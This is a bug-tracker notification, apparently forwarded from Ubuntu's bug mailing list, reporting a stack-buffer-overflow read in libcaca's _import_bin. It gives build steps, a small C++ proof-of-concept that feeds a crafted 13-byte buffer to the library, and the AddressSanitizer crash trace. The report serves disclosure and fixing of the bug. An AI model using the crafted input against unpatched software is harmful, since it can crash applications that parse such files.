[Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin

xiao huang Thu, 22 Apr 2021 18:15:58 -0700

** Description changed:

  Hello ubuntu security team
+ 
+ issues：https://github.com/cacalabs/libcaca/issues/56
+ 
  System info：
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1
+ 
  
  libcaca version e4968ba
  
  Verification steps：
  1.Get the source code of libcaca
  2.Compile the libcaca.so library
  
  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or
  
  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_bin.cc && build
  
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include <assert.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <fstream>
  #include <iostream>
  
  using namespace std;
  
  void crash(const uint8_t *Data, size_t Size) {
  
-   if(Size<8) return ;
-   size_t len=0;
-   caca_canvas_t *cv;
-   cv = caca_create_canvas(0,0);
-   caca_create_frame(cv,0);
-   caca_set_frame(cv,0);
-   caca_import_canvas_from_memory(cv,Data,Size,"bin");
-   caca_free_canvas(cv);
-   cv=NULL;
+   if(Size<8) return ;
+   size_t len=0;
+   caca_canvas_t *cv;
+   cv = caca_create_canvas(0,0);
+   caca_create_frame(cv,0);
+   caca_set_frame(cv,0);
+   caca_import_canvas_from_memory(cv,Data,Size,"bin");
+   caca_free_canvas(cv);
+   cv=NULL;
  
  }
  
  int main(int args,char* argv[]){
-         size_t  len = 0;
-         unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
-         len = sizeof(buffer)/sizeof(unsigned char);
-         printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
-         crash((const uint8_t*)buffer,len);
-         return 0;
+         size_t  len = 0;
+         unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
+         len = sizeof(buffer)/sizeof(unsigned char);
+         printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
+         crash((const uint8_t*)buffer,len);
+         return 0;
  
  }
  4.compile poc_bin.cc
  
  clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_bin
  5.Run poc_bin
  asan info:
  
  =================================================================
  ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
  READ of size 1 at 0x7ffe7cd3774d thread T0
-     #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
-     #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
-     #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
-     #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
-     #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
+     #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
+     #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
+     #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
+     #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
+     #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
  
  Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
-     #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
+     #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
  
-   This frame has 1 object(s):
-     [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
+   This frame has 1 object(s):
+     [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
-       (longjmp and C++ exceptions *are* supported)
+       (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
  Shadow bytes around the buggy address:
-   0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
-   0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Shadow byte legend (one shadow byte represents 8 application bytes):
-   Addressable:           00
-   Partially addressable: 01 02 03 04 05 06 07 
-   Heap left redzone:       fa
-   Freed heap region:       fd
-   Stack left redzone:      f1
-   Stack mid redzone:       f2
-   Stack right redzone:     f3
-   Stack after return:      f5
-   Stack use after scope:   f8
-   Global redzone:          f9
-   Global init order:       f6
-   Poisoned by user:        f7
-   Container overflow:      fc
-   Array cookie:            ac
-   Intra object redzone:    bb
-   ASan internal:           fe
-   Left alloca redzone:     ca
-   Right alloca redzone:    cb
-   Shadow gap:              cc
+   Addressable:           00
+   Partially addressable: 01 02 03 04 05 06 07
+   Heap left redzone:       fa
+   Freed heap region:       fd
+   Stack left redzone:      f1
+   Stack mid redzone:       f2
+   Stack right redzone:     f3
+   Stack after return:      f5
+   Stack use after scope:   f8
+   Global redzone:          f9
+   Global init order:       f6
+   Poisoned by user:        f7
+   Container overflow:      fc
+   Array cookie:            ac
+   Intra object redzone:    bb
+   ASan internal:           fe
+   Left alloca redzone:     ca
+   Right alloca redzone:    cb
+   Shadow gap:              cc
  ==3817476==ABORTING
  
  Thanks


-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1925468

Title:
  stack-buffer-overflow of import.c in function _import_bin

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1925468/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin

Reply via email to